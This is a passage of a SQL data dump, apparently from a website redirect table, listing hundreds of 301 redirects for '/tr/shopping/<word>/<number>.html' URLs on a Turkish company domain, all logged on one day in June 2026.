00:00:00',301),(69486,'https://3s-technologies.com.tr/tr/shopping/concession/3468530068.html',NULL,'https://3s-technologies.com.tr/shopping/concession/3468530068.html','',1,0,'2026-06-11 01:11:23','0000-00-00 00:00:00',301),(69487,'https://3s-technologies.com.tr/tr/shopping/misalter/2773781123.html',NULL,'https://3s-technologies.com.tr/shopping/misalter/2773781123.html','',1,0,'2026-06-11 01:11:26','0000-00-00 00:00:00',301),(69488,'https://3s-technologies.com.tr/tr/shopping/inhere/1382847949.html',NULL,'https://3s-technologies.com.tr/shopping/inhere/1382847949.html','',1,0,'2026-06-11 01:11:29','0000-00-00 00:00:00',301),(69489,'https://3s-technologies.com.tr/tr/shopping/abodance/2597307597.html',NULL,'https://3s-technologies.com.tr/shopping/abodance/2597307597.html','',1,0,'2026-06-11 01:11:37','0000-00-00 00:00:00',301),(69490,'https://3s-technologies.com.tr/tr/shopping/miquelet/53639523.html',NULL,'https://3s-technologies.com.tr/shopping/miquelet/53639523.html','',1,0,'2026-06-11 01:11:41','0000-00-00 00:00:00',301),(69491,'https://3s-technologies.com.tr/tr/shopping/harnessed/1073265976.html',NULL,'https://3s-technologies.com.tr/shopping/harnessed/1073265976.html','',1,0,'2026-06-11 01:11:44','0000-00-00 00:00:00',301),(69492,'https://3s-technologies.com.tr/tr/shopping/admiralties/3964575982.html',NULL,'https://3s-technologies.com.tr/shopping/admiralties/3964575982.html','',1,0,'2026-06-11 01:11:47','0000-00-00 00:00:00',301),(69493,'https://3s-technologies.com.tr/tr/shopping/enarch/4253072312.html',NULL,'https://3s-technologies.com.tr/shopping/enarch/4253072312.html','',1,0,'2026-06-11 01:11:54','0000-00-00 00:00:00',301),(69494,'https://3s-technologies.com.tr/tr/shopping/barillet/3719219720.html',NULL,'https://3s-technologies.com.tr/shopping/barillet/3719219720.html','',1,0,'2026-06-11 01:11:59','0000-00-00 00:00:00',301),(69495,'https://3s-technologies.com.tr/tr/shopping/marrowed/151822198.html',NULL,'https://3s-technologies.com.tr/shopping/marrowed/151822198.html','',1,0,'2026-06-11 01:12:01','0000-00-00 00:00:00',301),(69496,'https://3s-technologies.com.tr/tr/shopping/incoordinate/1072053877.html',NULL,'https://3s-technologies.com.tr/shopping/incoordinate/1072053877.html','',1,0,'2026-06-11 01:12:05','0000-00-00 00:00:00',301),(69497,'https://3s-technologies.com.tr/tr/shopping/enwrapment/3330116501.html',NULL,'https://3s-technologies.com.tr/shopping/enwrapment/3330116501.html','',1,0,'2026-06-11 01:12:08','0000-00-00 00:00:00',301),(69498,'https://3s-technologies.com.tr/tr/shopping/fireplace/4206513388.html',NULL,'https://3s-technologies.com.tr/shopping/fireplace/4206513388.html','',1,0,'2026-06-11 01:12:10','0000-00-00 00:00:00',301),(69499,'https://3s-technologies.com.tr/tr/shopping/nubility/2750887005.html',NULL,'https://3s-technologies.com.tr/shopping/nubility/2750887005.html','',1,0,'2026-06-11 01:12:14','0000-00-00 00:00:00',301),(69500,'https://3s-technologies.com.tr/tr/shopping/weighable/2791136193.html',NULL,'https://3s-technologies.com.tr/shopping/weighable/2791136193.html','',1,0,'2026-06-11 01:12:17','0000-00-00 00:00:00',301),(69501,'https://3s-technologies.com.tr/tr/shopping/burnet/2473477345.html',NULL,'https://3s-technologies.com.tr/shopping/burnet/2473477345.html','',1,0,'2026-06-11 01:12:20','0000-00-00 00:00:00',301),(69502,'https://3s-technologies.com.tr/tr/shopping/trimesic/508476000.html',NULL,'https://3s-technologies.com.tr/shopping/trimesic/508476000.html','',1,0,'2026-06-11 01:12:23','0000-00-00 00:00:00',301),(69503,'https://3s-technologies.com.tr/tr/shopping/nauheim/529976200.html',NULL,'https://3s-technologies.com.tr/shopping/nauheim/529976200.html','',1,0,'2026-06-11 01:12:26','0000-00-00 00:00:00',301),(69504,'https://3s-technologies.com.tr/tr/shopping/selfreproaching/148445509.html',NULL,'https://3s-technologies.com.tr/shopping/selfreproaching/148445509.html','',1,0,'2026-06-11 01:12:29','0000-00-00 00:00:00',301),(69505,'https://3s-technologies.com.tr/tr/shopping/packway/3210475777.html',NULL,'https://3s-technologies.com.tr/shopping/packway/3210475777.html','',1,0,'2026-06-11 01:12:31','0000-00-00 00:00:00',301),(69506,'https://3s-technologies.com.tr/tr/shopping/dovetailed/2242256644.html',NULL,'https://3s-technologies.com.tr/shopping/dovetailed/2242256644.html','',1,0,'2026-06-11 01:12:42','0000-00-00 00:00:00',301),(69507,'https://3s-technologies.com.tr/tr/shopping/lapboard/3828750120.html',NULL,'https://3s-technologies.com.tr/shopping/lapboard/3828750120.html','',1,0,'2026-06-11 01:12:45','0000-00-00 00:00:00',301),(69508,'https://3s-technologies.com.tr/tr/shopping/ahromatic/1405300656.html',NULL,'https://3s-technologies.com.tr/shopping/ahromatic/1405300656.html','',1,0,'2026-06-11 01:12:48','0000-00-00 00:00:00',301),(69509,'https://3s-technologies.com.tr/tr/shopping/solanine/1924925610.html',NULL,'https://3s-technologies.com.tr/shopping/solanine/1924925610.html','',1,0,'2026-06-11 01:12:51','0000-00-00 00:00:00',301),(69510,'https://3s-technologies.com.tr/tr/shopping/pencilled/3884093687.html',NULL,'https://3s-technologies.com.tr/shopping/pencilled/3884093687.html','',1,0,'2026-06-11 01:12:54','0000-00-00 00:00:00',301),(69511,'https://3s-technologies.com.tr/tr/shopping/cupidity/833525541.html',NULL,'https://3s-technologies.com.tr/shopping/cupidity/833525541.html','',1,0,'2026-06-11 01:12:57','0000-00-00 00:00:00',301),(69512,'https://3s-technologies.com.tr/tr/shopping/competible/1806636653.html',NULL,'https://3s-technologies.com.tr/shopping/competible/1806636653.html','',1,0,'2026-06-11 01:13:00','0000-00-00 00:00:00',301),(69513,'https://3s-technologies.com.tr/tr/shopping/mercenaries/3497161385.html',NULL,'https://3s-technologies.com.tr/shopping/mercenaries/3497161385.html','',1,0,'2026-06-11 01:13:03','0000-00-00 00:00:00',301),(69514,'https://3s-technologies.com.tr/tr/shopping/uranoscopus/2754868628.html',NULL,'https://3s-technologies.com.tr/shopping/uranoscopus/2754868628.html','',1,0,'2026-06-11 01:13:06','0000-00-00 00:00:00',301),(69515,'https://3s-technologies.com.tr/tr/shopping/voluntary/2311744298.html',NULL,'https://3s-technologies.com.tr/shopping/voluntary/2311744298.html','',1,0,'2026-06-11 01:13:09','0000-00-00 00:00:00',301),(69516,'https://3s-technologies.com.tr/tr/shopping/marrot/3741327101.html',NULL,'https://3s-technologies.com.tr/shopping/marrot/3741327101.html','',1,0,'2026-06-11 01:13:12','0000-00-00 00:00:00',301),(69517,'https://3s-technologies.com.tr/tr/shopping/senecas/1143498248.html',NULL,'https://3s-technologies.com.tr/shopping/senecas/1143498248.html','',1,0,'2026-06-11 01:13:15','0000-00-00 00:00:00',301),(69518,'https://3s-technologies.com.tr/tr/shopping/medicable/725742175.html',NULL,'https://3s-technologies.com.tr/shopping/medicable/725742175.html','',1,0,'2026-06-11 01:13:18','0000-00-00 00:00:00',301),(69519,'https://3s-technologies.com.tr/tr/shopping/sythe/4006971448.html',NULL,'https://3s-technologies.com.tr/shopping/sythe/4006971448.html','',1,0,'2026-06-11 01:13:21','0000-00-00 00:00:00',301),(69520,'https://3s-technologies.com.tr/tr/shopping/guying/1285288504.html',NULL,'https://3s-technologies.com.tr/shopping/guying/1285288504.html','',1,0,'2026-06-11 01:13:24','0000-00-00 00:00:00',301),(69521,'https://3s-technologies.com.tr/tr/shopping/participle/2904787900.html',NULL,'https://3s-technologies.com.tr/shopping/participle/2904787900.html','',1,0,'2026-06-11 01:13:27','0000-00-00 00:00:00',301),(69522,'https://3s-technologies.com.tr/tr/shopping/berate/4035439242.html',NULL,'https://3s-technologies.com.tr/shopping/berate/4035439242.html','',1,0,'2026-06-11 01:13:30','0000-00-00 00:00:00',301),(69523,'https://3s-technologies.com.tr/tr/shopping/coraciadae/2867963863.html',NULL,'https://3s-technologies.com.tr/shopping/coraciadae/2867963863.html','',1,0,'2026-06-11 01:13:33','0000-00-00 00:00:00',301),(69524,'https://3s-technologies.com.tr/tr/shopping/nobles/2923355053.html',NULL,'https://3s-technologies.com.tr/shopping/nobles/2923355053.html','',1,0,'2026-06-11 01:13:36','0000-00-00 00:00:00',301),(69525,'https://3s-technologies.com.tr/tr/shopping/ponderosity/1553496749.html',NULL,'https://3s-technologies.com.tr/shopping/ponderosity/1553496749.html','',1,0,'2026-06-11 01:13:39','0000-00-00 00:00:00',301),(69526,'https://3s-technologies.com.tr/tr/shopping/coneincone/736131834.html',NULL,'https://3s-technologies.com.tr/shopping/coneincone/736131834.html','',1,0,'2026-06-11 01:13:45','0000-00-00 00:00:00',301),(69527,'https://3s-technologies.com.tr/tr/shopping/chordee/979626681.html',NULL,'https://3s-technologies.com.tr/shopping/chordee/979626681.html','',1,0,'2026-06-11 01:13:47','0000-00-00 00:00:00',301),(69528,'https://3s-technologies.com.tr/tr/shopping/plagihedral/125778602.html',NULL,'https://3s-technologies.com.tr/shopping/plagihedral/125778602.html','',1,0,'2026-06-11 01:13:50','0000-00-00 00:00:00',301),(69529,'https://3s-technologies.com.tr/tr/shopping/diclinous/3571628593.html',NULL,'https://3s-technologies.com.tr/shopping/diclinous/3571628593.html','',1,0,'2026-06-11 01:13:53','0000-00-00 00:00:00',301),(69530,'https://3s-technologies.com.tr/tr/shopping/rhynchotus/1315524869.html',NULL,'https://3s-technologies.com.tr/shopping/rhynchotus/1315524869.html','',1,0,'2026-06-11 01:13:56','0000-00-00 00:00:00',301),(69531,'https://3s-technologies.com.tr/tr/shopping/thinnish/3422316470.html',NULL,'https://3s-technologies.com.tr/shopping/thinnish/3422316470.html','',1,0,'2026-06-11 01:13:59','0000-00-00 00:00:00',301),(69532,'https://3s-technologies.com.tr/tr/shopping/deceptible/2276359603.html',NULL,'https://3s-technologies.com.tr/shopping/deceptible/2276359603.html','',1,0,'2026-06-11 01:14:02','0000-00-00 00:00:00',301),(69533,'https://3s-technologies.com.tr/tr/shopping/demersed/3430886913.html',NULL,'https://3s-technologies.com.tr/shopping/demersed/3430886913.html','',1,0,'2026-06-11 01:14:05','0000-00-00 00:00:00',301),(69534,'https://3s-technologies.com.tr/tr/shopping/pedlar/2892534372.html',NULL,'https://3s-technologies.com.tr/shopping/pedlar/2892534372.html','',1,0,'2026-06-11 01:14:10','0000-00-00 00:00:00',301),(69535,'https://3s-technologies.com.tr/tr/shopping/siriasis/3013130808.html',NULL,'https://3s-technologies.com.tr/shopping/siriasis/3013130808.html','',1,0,'2026-06-11 01:14:12','0000-00-00 00:00:00',301),(69536,'https://3s-technologies.com.tr/tr/shopping/obtainer/764990378.html',NULL,'https://3s-technologies.com.tr/shopping/obtainer/764990378.html','',1,0,'2026-06-11 01:14:15','0000-00-00 00:00:00',301),(69537,'https://3s-technologies.com.tr/tr/shopping/ahull/1869598156.html',NULL,'https://3s-technologies.com.tr/shopping/ahull/1869598156.html','',1,0,'2026-06-11 01:14:18','0000-00-00 00:00:00',301),(69538,'https://3s-technologies.com.tr/tr/shopping/puntel/2400189871.html',NULL,'https://3s-technologies.com.tr/shopping/puntel/2400189871.html','',1,0,'2026-06-11 01:14:21','0000-00-00 00:00:00',301),(69539,'https://3s-technologies.com.tr/tr/shopping/clomb/1577768704.html',NULL,'https://3s-technologies.com.tr/shopping/clomb/1577768704.html','',1,0,'2026-06-11 01:14:24','0000-00-00 00:00:00',301),(69540,'https://3s-technologies.com.tr/tr/shopping/acarpelous/1829530771.html',NULL,'https://3s-technologies.com.tr/shopping/acarpelous/1829530771.html','',1,0,'2026-06-11 01:14:27','0000-00-00 00:00:00',301),(69541,'https://3s-technologies.com.tr/tr/shopping/lagamys/114013305.html',NULL,'https://3s-technologies.com.tr/shopping/lagamys/114013305.html','',1,0,'2026-06-11 01:14:30','0000-00-00 00:00:00',301),(69542,'https://3s-technologies.com.tr/tr/shopping/tailstock/3992040608.html',NULL,'https://3s-technologies.com.tr/shopping/tailstock/3992040608.html','',1,0,'2026-06-11 01:14:33','0000-00-00 00:00:00',301),(69543,'https://3s-technologies.com.tr/tr/shopping/thorinum/30156536.html',NULL,'https://3s-technologies.com.tr/shopping/thorinum/30156536.html','',1,0,'2026-06-11 01:14:36','0000-00-00 00:00:00',301),(69544,'https://3s-technologies.com.tr/tr/shopping/ambon/3607896142.html',NULL,'https://3s-technologies.com.tr/shopping/ambon/3607896142.html','',1,0,'2026-06-11 01:14:40','0000-00-00 00:00:00',301),(69545,'https://3s-technologies.com.tr/tr/shopping/encyclopedist/2861999469.html',NULL,'https://3s-technologies.com.tr/shopping/encyclopedist/2861999469.html','',1,0,'2026-06-11 01:14:42','0000-00-00 00:00:00',301),(69546,'https://3s-technologies.com.tr/tr/shopping/osoberry/50957423.html',NULL,'https://3s-technologies.com.tr/shopping/osoberry/50957423.html','',1,0,'2026-06-11 01:14:47','0000-00-00 00:00:00',301),(69547,'https://3s-technologies.com.tr/tr/shopping/casemated/1154909542.html',NULL,'https://3s-technologies.com.tr/shopping/casemated/1154909542.html','',1,0,'2026-06-11 01:14:49','0000-00-00 00:00:00',301),(69548,'https://3s-technologies.com.tr/tr/shopping/university/427112557.html',NULL,'https://3s-technologies.com.tr/shopping/university/427112557.html','',1,0,'2026-06-11 01:14:52','0000-00-00 00:00:00',301),(69549,'https://3s-technologies.com.tr/tr/shopping/portliness/3233541944.html',NULL,'https://3s-technologies.com.tr/shopping/portliness/3233541944.html','',1,0,'2026-06-11 01:14:58','0000-00-00 00:00:00',301),(69550,'https://3s-technologies.com.tr/tr/shopping/sodado/2344798681.html',NULL,'https://3s-technologies.com.tr/shopping/sodado/2344798681.html','',1,0,'2026-06-11 01:15:01','0000-00-00 00:00:00',301),(69551,'https://3s-technologies.com.tr/tr/shopping/ordal/886656040.html',NULL,'https://3s-technologies.com.tr/shopping/ordal/886656040.html','',1,0,'2026-06-11 01:15:04','0000-00-00 00:00:00',301),(69552,'https://3s-technologies.com.tr/tr/shopping/illegitimatize/618447811.html',NULL,'https://3s-technologies.com.tr/shopping/illegitimatize/618447811.html','',1,0,'2026-06-11 01:15:07','0000-00-00 00:00:00',301),(69553,'https://3s-technologies.com.tr/tr/shopping/spruceness/2241044561.html',NULL,'https://3s-technologies.com.tr/shopping/spruceness/2241044561.html','',1,0,'2026-06-11 01:15:10','0000-00-00 00:00:00',301),(69554,'https://3s-technologies.com.tr/tr/shopping/cetorhinus/2551698933.html',NULL,'https://3s-technologies.com.tr/shopping/cetorhinus/2551698933.html','',1,0,'2026-06-11 01:15:13','0000-00-00 00:00:00',301),(69555,'https://3s-technologies.com.tr/tr/shopping/slotting/2850445286.html',NULL,'https://3s-technologies.com.tr/shopping/slotting/2850445286.html','',1,0,'2026-06-11 01:15:16','0000-00-00 00:00:00',301),(69556,'https://3s-technologies.com.tr/tr/shopping/staleness/2705114834.html',NULL,'https://3s-technologies.com.tr/shopping/staleness/2705114834.html','',1,0,'2026-06-11 01:15:19','0000-00-00 00:00:00',301),(69557,'https://3s-technologies.com.tr/tr/shopping/reservior/2428821172.html',NULL,'https://3s-technologies.com.tr/shopping/reservior/2428821172.html','',1,0,'2026-06-11 01:15:22','0000-00-00 00:00:00',301),(69558,'https://3s-technologies.com.tr/tr/shopping/dacota/2542143650.html',NULL,'https://3s-technologies.com.tr/shopping/dacota/2542143650.html','',1,0,'2026-06-11 01:15:25','0000-00-00 00:00:00',301),(69559,'https://3s-technologies.com.tr/tr/shopping/globulites/2309579724.html',NULL,'https://3s-technologies.com.tr/shopping/globulites/2309579724.html','',1,0,'2026-06-11 01:15:28','0000-00-00 00:00:00',301),(69560,'https://3s-technologies.com.tr/tr/shopping/pteridomania/3389214496.html',NULL,'https://3s-technologies.com.tr/shopping/pteridomania/3389214496.html','',1,0,'2026-06-11 01:15:31','0000-00-00 00:00:00',301),(69561,'https://3s-technologies.com.tr/tr/shopping/reclinate/2827732987.html',NULL,'https://3s-technologies.com.tr/shopping/reclinate/2827732987.html','',1,0,'2026-06-11 01:15:34','0000-00-00 00:00:00',301),(69562,'https://3s-technologies.com.tr/tr/shopping/crystalline/3423873911.html',NULL,'https://3s-technologies.com.tr/shopping/crystalline/3423873911.html','',1,0,'2026-06-11 01:15:37','0000-00-00 00:00:00',301),(69563,'https://3s-technologies.com.tr/tr/shopping/susan/3809626511.html',NULL,'https://3s-technologies.com.tr/shopping/susan/3809626511.html','',1,0,'2026-06-11 01:15:40','0000-00-00 00:00:00',301),(69564,'https://3s-technologies.com.tr/tr/shopping/eruct/1555920931.html',NULL,'https://3s-technologies.com.tr/shopping/eruct/1555920931.html','',1,0,'2026-06-11 01:15:43','0000-00-00 00:00:00',301),(69565,'https://3s-technologies.com.tr/tr/shopping/wedder/237054605.html',NULL,'https://3s-technologies.com.tr/shopping/wedder/237054605.html','',1,0,'2026-06-11 01:15:46','0000-00-00 00:00:00',301),(69566,'https://3s-technologies.com.tr/tr/shopping/augean/802633565.html',NULL,'https://3s-technologies.com.tr/shopping/augean/802633565.html','',1,0,'2026-06-11 01:15:49','0000-00-00 00:00:00',301),(69567,'https://3s-technologies.com.tr/tr/shopping/inosculating/3227741073.html',NULL,'https://3s-technologies.com.tr/shopping/inosculating/3227741073.html','',1,0,'2026-06-11 01:15:52','0000-00-00 00:00:00',301),(69568,'https://3s-technologies.com.tr/tr/shopping/standoff/2014008878.html',NULL,'https://3s-technologies.com.tr/shopping/standoff/2014008878.html','',1,0,'2026-06-11 01:15:57','0000-00-00 00:00:00',301),(69569,'https://3s-technologies.com.tr/tr/shopping/waterwork/358027732.html',NULL,'https://3s-technologies.com.tr/shopping/waterwork/358027732.html','',1,0,'2026-06-11 01:15:59','0000-00-00 00:00:00',301),(69570,'https://3s-technologies.com.tr/tr/shopping/easygoingness/2265884574.html',NULL,'https://3s-technologies.com.tr/shopping/easygoingness/2265884574.html','',1,0,'2026-06-11 01:16:03','0000-00-00 00:00:00',301),(69571,'https://3s-technologies.com.tr/tr/shopping/malarious/450998373.html',NULL,'https://3s-technologies.com.tr/shopping/malarious/450998373.html','',1,0,'2026-06-11 01:16:06','0000-00-00 00:00:00',301),(69572,'https://3s-technologies.com.tr/tr/shopping/laborously/1204884378.html',NULL,'https://3s-technologies.com.tr/shopping/laborously/1204884378.html','',1,0,'2026-06-11 01:16:08','0000-00-00 00:00:00',301),(69573,'https://3s-technologies.com.tr/tr/shopping/encounter/3531342513.html',NULL,'https://3s-technologies.com.tr/shopping/encounter/3531342513.html','',1,0,'2026-06-11 01:16:11','0000-00-00 00:00:00',301),(69574,'https://3s-technologies.com.tr/tr/shopping/captainry/2174062312.html',NULL,'https://3s-technologies.com.tr/shopping/captainry/2174062312.html','',1,0,'2026-06-11 01:16:15','0000-00-00 00:00:00',301),(69575,'https://3s-technologies.com.tr/tr/shopping/planet/3461595235.html',NULL,'https://3s-technologies.com.tr/shopping/planet/3461595235.html','',1,0,'2026-06-11 01:16:17','0000-00-00 00:00:00',301),(69576,'https://3s-technologies.com.tr/tr/shopping/eulogizing/1865087521.html',NULL,'https://3s-technologies.com.tr/shopping/eulogizing/1865087521.html','',1,0,'2026-06-11 01:16:20','0000-00-00 00:00:00',301),(69577,'https://3s-technologies.com.tr/tr/shopping/ratitae/2929627897.html',NULL,'https://3s-technologies.com.tr/shopping/ratitae/2929627897.html','',1,0,'2026-06-11 01:16:24','0000-00-00 00:00:00',301),(69578,'https://3s-technologies.com.tr/tr/shopping/recorded/649415773.html',NULL,'https://3s-technologies.com.tr/shopping/recorded/649415773.html','',1,0,'2026-06-11 01:16:27','0000-00-00 00:00:00',301),(69579,'https://3s-technologies.com.tr/tr/shopping/embodiment/2172850213.html',NULL,'https://3s-technologies.com.tr/shopping/embodiment/2172850213.html','',1,0,'2026-06-11 01:16:30','0000-00-00 00:00:00',301),(69580,'https://3s-technologies.com.tr/tr/shopping/roaring/4198462541.html',NULL,'https://3s-technologies.com.tr/shopping/roaring/4198462541.html','',1,0,'2026-06-11 01:16:33','0000-00-00 00:00:00',301),(69581,'https://3s-technologies.com.tr/tr/shopping/tomtom/3365020678.html',NULL,'https://3s-technologies.com.tr/shopping/tomtom/3365020678.html','',1,0,'2026-06-11 01:16:36','0000-00-00 00:00:00',301),(69582,'https://3s-technologies.com.tr/tr/shopping/signification/2357083558.html',NULL,'https://3s-technologies.com.tr/shopping/signification/2357083558.html','',1,0,'2026-06-11 01:16:39','0000-00-00 00:00:00',301),(69583,'https://3s-technologies.com.tr/tr/shopping/unamiability/3779468299.html',NULL,'https://3s-technologies.com.tr/shopping/unamiability/3779468299.html','',1,0,'2026-06-11 01:16:44','0000-00-00 00:00:00',301),(69584,'https://3s-technologies.com.tr/tr/shopping/disacquaint/2016433060.html',NULL,'https://3s-technologies.com.tr/shopping/disacquaint/2016433060.html','',1,0,'2026-06-11 01:16:46','0000-00-00 00:00:00',301),(69585,'https://3s-technologies.com.tr/tr/shopping/vesuvianite/3996756027.html',NULL,'https://3s-technologies.com.tr/shopping/vesuvianite/3996756027.html','',1,0,'2026-06-11 01:16:49','0000-00-00 00:00:00',301),(69586,'https://3s-technologies.com.tr/tr/shopping/mumbled/1352689721.html',NULL,'https://3s-technologies.com.tr/shopping/mumbled/1352689721.html','',1,0,'2026-06-11 01:16:52','0000-00-00 00:00:00',301),(69587,'https://3s-technologies.com.tr/tr/shopping/crypt/1717332839.html',NULL,'https://3s-technologies.com.tr/shopping/crypt/1717332839.html','',1,0,'2026-06-11 01:16:55','0000-00-00 00:00:00',301),(69588,'https://3s-technologies.com.tr/tr/shopping/impurple/2348858473.html',NULL,'https://3s-technologies.com.tr/shopping/impurple/2348858473.html','',1,0,'2026-06-11 01:16:58','0000-00-00 00:00:00',301),(69589,'https://3s-technologies.com.tr/tr/shopping/broadway/2199546382.html',NULL,'https://3s-technologies.com.tr/shopping/broadway/2199546382.html','',1,0,'2026-06-11 01:17:01','0000-00-00 00:00:00',301),(69590,'https://3s-technologies.com.tr/tr/shopping/polycystid/2178651116.html',NULL,'https://3s-technologies.com.tr/shopping/polycystid/2178651116.html','',1,0,'2026-06-11 01:17:04','0000-00-00 00:00:00',301),(69591,'https://3s-technologies.com.tr/tr/shopping/deaccess/1783443820.html',NULL,'https://3s-technologies.com.tr/shopping/deaccess/1783443820.html','',1,0,'2026-06-11 01:17:07','0000-00-00 00:00:00',301),(69592,'https://3s-technologies.com.tr/tr/shopping/dearnly/2132083635.html',NULL,'https://3s-technologies.com.tr/shopping/dearnly/2132083635.html','',1,0,'2026-06-11 01:17:10','0000-00-00 00:00:00',301),(69593,'https://3s-technologies.com.tr/tr/shopping/thurling/3579113552.html',NULL,'https://3s-technologies.com.tr/shopping/thurling/3579113552.html','',1,0,'2026-06-11 01:17:13','0000-00-00 00:00:00',301),(69594,'https://3s-technologies.com.tr/tr/shopping/liquidness/3632112909.html',NULL,'https://3s-technologies.com.tr/shopping/liquidness/3632112909.html','',1,0,'2026-06-11 01:17:16','0000-00-00 00:00:00',301),(69595,'https://3s-technologies.com.tr/tr/shopping/falsity/1866299604.html',NULL,'https://3s-technologies.com.tr/shopping/falsity/1866299604.html','',1,0,'2026-06-11 01:17:19','0000-00-00 00:00:00',301),(69596,'https://3s-technologies.com.tr/tr/shopping/antephialtic/247916253.html',NULL,'https://3s-technologies.com.tr/shopping/antephialtic/247916253.html','',1,0,'2026-06-11 01:17:22','0000-00-00 00:00:00',301),(69597,'https://3s-technologies.com.tr/tr/shopping/subdue/2193745479.html',NULL,'https://3s-technologies.com.tr/shopping/subdue/2193745479.html','',1,0,'2026-06-11 01:17:26','0000-00-00 00:00:00',301),(69598,'https://3s-technologies.com.tr/tr/shopping/slavish/3203800536.html',NULL,'https://3s-technologies.com.tr/shopping/slavish/3203800536.html','',1,0,'2026-06-11 01:17:28','0000-00-00 00:00:00',301),(69599,'https://3s-technologies.com.tr/tr/shopping/geographical/1232399697.html',NULL,'https://3s-technologies.com.tr/shopping/geographical/1232399697.html','',1,0,'2026-06-11 01:17:31','0000-00-00 00:00:00',301),(69600,'https://3s-technologies.com.tr/tr/shopping/pentrough/3458055039.html',NULL,'https://3s-technologies.com.tr/shopping/pentrough/3458055039.html','',1,0,'2026-06-11 01:17:37','0000-00-00 00:00:00',301),(69601,'https://3s-technologies.com.tr/tr/shopping/soothsay/4000132716.html',NULL,'https://3s-technologies.com.tr/shopping/soothsay/4000132716.html','',1,0,'2026-06-11 01:17:40','0000-00-00 00:00:00',301),(69602,'https://3s-technologies.com.tr/tr/shopping/blenching/1821643447.html',NULL,'https://3s-technologies.com.tr/shopping/blenching/1821643447.html','',1,0,'2026-06-11 01:17:43','0000-00-00 00:00:00',301),(69603,'https://3s-technologies.com.tr/tr/shopping/macrocephalus/2129919045.html',NULL,'https://3s-technologies.com.tr/shopping/macrocephalus/2129919045.html','',1,0,'2026-06-11 01:17:46','0000-00-00 00:00:00',301),(69604,'https://3s-technologies.com.tr/tr/shopping/fatcontaining/2226240336.html',NULL,'https://3s-technologies.com.tr/shopping/fatcontaining/2226240336.html','',1,0,'2026-06-11 01:17:49','0000-00-00 00:00:00',301),(69605,'https://3s-technologies.com.tr/tr/shopping/overemphasis/1679689668.html',NULL,'https://3s-technologies.com.tr/shopping/overemphasis/1679689668.html','',1,0,'2026-06-11 01:17:52','0000-00-00 00:00:00',301),(69606,'https://3s-technologies.com.tr/tr/shopping/desultory/2567312908.html',NULL,'https://3s-technologies.com.tr/shopping/desultory/2567312908.html','',1,0,'2026-06-11 01:17:55','0000-00-00 00:00:00',301),(69607,'https://3s-technologies.com.tr/tr/shopping/tossed/4176355160.html',NULL,'https://3s-technologies.com.tr/shopping/tossed/4176355160.html','',1,0,'2026-06-11 01:17:58','0000-00-00 00:00:00',301),(69608,'https://3s-technologies.com.tr/tr/shopping/coran/3858783887.html',NULL,'https://3s-technologies.com.tr/shopping/coran/3858783887.html','',1,0,'2026-06-11 01:18:01','0000-00-00 00:00:00',301),(69609,'https://3s-technologies.com.tr/tr/shopping/platinotype/747761955.html',NULL,'https://3s-technologies.com.tr/shopping/platinotype/747761955.html','',1,0,'2026-06-11 01:18:04','0000-00-00 00:00:00',301),(69610,'https://3s-technologies.com.tr/tr/shopping/pipemouth/1550198197.html',NULL,'https://3s-technologies.com.tr/shopping/pipemouth/1550198197.html','',1,0,'2026-06-11 01:18:07','0000-00-00 00:00:00',301),(69611,'https://3s-technologies.com.tr/tr/shopping/liturgy/3342353787.html',NULL,'https://3s-technologies.com.tr/shopping/liturgy/3342353787.html','',1,0,'2026-06-11 01:18:10','0000-00-00 00:00:00',301),(69612,'https://3s-technologies.com.tr/tr/shopping/ligniferous/3945790102.html',NULL,'https://3s-technologies.com.tr/shopping/ligniferous/3945790102.html','',1,0,'2026-06-11 01:18:13','0000-00-00 00:00:00',301),(69613,'https://3s-technologies.com.tr/tr/shopping/riddled/1695225490.html',NULL,'https://3s-technologies.com.tr/shopping/riddled/1695225490.html','',1,0,'2026-06-11 01:18:16','0000-00-00 00:00:00',301),(69614,'https://3s-technologies.com.tr/tr/shopping/gemmae/2220275910.html',NULL,'https://3s-technologies.com.tr/shopping/gemmae/2220275910.html','',1,0,'2026-06-11 01:18:19','0000-00-00 00:00:00',301),(69615,'https://3s-technologies.com.tr/tr/shopping/repass/2089851692.html',NULL,'https://3s-technologies.com.tr/shopping/repass/2089851692.html','',1,0,'2026-06-11 01:18:22','0000-00-00 00:00:00',301),(69616,'https://3s-technologies.com.tr/tr/shopping/friezer/1535663376.html',NULL,'https://3s-technologies.com.tr/shopping/friezer/1535663376.html','',1,0,'2026-06-11 01:18:25','0000-00-00 00:00:00',301),(69617,'https://3s-technologies.com.tr/tr/shopping/prankish/1352853260.html',NULL,'https://3s-technologies.com.tr/shopping/prankish/1352853260.html','',1,0,'2026-06-11 01:18:28','0000-00-00 00:00:00',301),(69618,'https://3s-technologies.com.tr/tr/shopping/asperated/2128706962.html',NULL,'https://3s-technologies.com.tr/shopping/asperated/2128706962.html','',1,0,'2026-06-11 01:18:31','0000-00-00 00:00:00',301),(69619,'https://3s-technologies.com.tr/tr/shopping/peptogen/793370619.html',NULL,'https://3s-technologies.com.tr/shopping/peptogen/793370619.html','',1,0,'2026-06-11 01:18:34','0000-00-00 00:00:00',301),(69620,'https://3s-technologies.com.tr/tr/shopping/displeasingness/1088021704.html',NULL,'https://3s-technologies.com.tr/shopping/displeasingness/1088021704.html','',1,0,'2026-06-11 01:18:37','0000-00-00 00:00:00',301),(69621,'https://3s-technologies.com.tr/tr/shopping/birse/2931956010.html',NULL,'https://3s-technologies.com.tr/shopping/birse/2931956010.html','',1,0,'2026-06-11 01:18:40','0000-00-00 00:00:00',301),(69622,'https://3s-technologies.com.tr/tr/shopping/dornic/4289841145.html',NULL,'https://3s-technologies.com.tr/shopping/dornic/4289841145.html','',1,0,'2026-06-11 01:18:43','0000-00-00 00:00:00',301),(69623,'https://3s-technologies.com.tr/tr/shopping/subinfeudation/823214019.html',NULL,'https://3s-technologies.com.tr/shopping/subinfeudation/823214019.html','',1,0,'2026-06-11 01:18:46','0000-00-00 00:00:00',301),(69624,'https://3s-technologies.com.tr/tr/shopping/promote/2226076813.html',NULL,'https://3s-technologies.com.tr/shopping/promote/2226076813.html','',1,0,'2026-06-11 01:18:49','0000-00-00 00:00:00',301),(69625,'https://3s-technologies.com.tr/tr/shopping/annuary/2191417366.html',NULL,'https://3s-technologies.com.tr/shopping/annuary/2191417366.html','',1,0,'2026-06-11 01:18:52','0000-00-00 00:00:00',301),(69626,'https://3s-technologies.com.tr/tr/shopping/tribunitian/1887754428.html',NULL,'https://3s-technologies.com.tr/shopping/tribunitian/1887754428.html','',1,0,'2026-06-11 01:18:55','0000-00-00 